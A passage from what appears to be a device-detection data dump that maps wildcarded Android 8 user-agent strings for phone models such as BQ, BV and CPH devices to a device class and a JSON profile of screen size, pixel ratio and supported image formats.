BLN-AL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BLOCK_MINI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BMM531A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BMM543D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BND-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BND-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BND-L24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BND-L34) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BPRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-4001G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-4501G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5000G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5002G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5004G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5010G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5011G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5015L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5300G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5302G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5512L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5514G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5515L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5516L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5517L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5520L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5521L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-5707G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-6010G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-6015L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":873,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-6016L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BQ-6200L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BS155) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BS650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BUZZ 1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV5500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV5800 PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV5800) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV5800Pro_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV5800_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV6800Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV6800Pro_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV8000Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV9000-F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV9000Pro-F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV9500-RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV9500Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BV9600Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Bee) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Black) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Blaupunkt_SM_02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C11_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C12 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":664,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C12 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":664,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":664,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C210AE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C5 2019) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C5L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C6 2019) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C6L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; C6x) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CAG-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CAG-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CAG-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CAG-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CLT-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CLT-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CLT-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; COL-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; COR-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1803) AppleWebKit/* (KHTML, like Gecko) Chrome','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1803) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1805) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1809) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1819) AppleWebKit/* (KHTML, like Gecko) Chrome','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1819) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1821) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1823) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; CPH1825) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 